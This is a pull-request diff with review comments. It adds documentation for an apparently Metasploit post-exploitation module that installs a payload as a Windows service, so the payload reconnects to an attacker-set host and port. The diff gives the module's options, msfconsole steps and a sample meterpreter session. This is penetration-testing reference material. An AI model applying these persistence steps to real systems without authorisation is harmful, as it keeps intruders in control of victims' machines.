documentation/modules/post/windows/manage/persistence_service.rb

```diff
@@ -0,0 +1,100 @@
+## Overview
+This Module will generate and upload an executable to a remote host and make it persistent service.
+It will create a new service which will start the payload whenever the service is running. Privilege is required.
+
+## Module Options
+LHOST  IP of host that will receive the connection from the payload.
+LPORT  Port for Payload to connect to.
+OPTIONS Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
+PAYLOAD The payload to use in the service.
+SESSION The session to run this module on.
+
+RetryTime The retry time that shell connect failed. 5 seconds as default.
+RemoteExePath  The remote victim exe path to run. Use temp directory as default.
+RemoteExeName  The remote victim name. Random string as default.
+ServiceName    The name of service. Random string as default.'
+ServiceDescription The description of service. Random string as default.
+
+
+## Verification steps
+* get session on target
+* `use post/windows/manage/persistence_service`
+* `set payload <payload>`
+* `set lport <lport>`
+* `set lhost <lhost>`
+* `set handler true`
+* `run`
+
+## Usage
+```
+msf5 post(windows/manage/persistence_service) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: test-PC\test
+meterpreter > sysinfo
+Computer        : TEST-PC
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 post(windows/manage/persistence_service) > options
```

Comment:
There are two options here. 1) show options if you've already set a bunch of items. Typically this gives longer output, 2) show setting the non-default items

Reply:
Thanks for your review.
Yeah, I have set the all necessary options before, so I just show options here, more clear I thought.
Maybe for more friendly to newbies to give the set guide? I am not very sure how to go.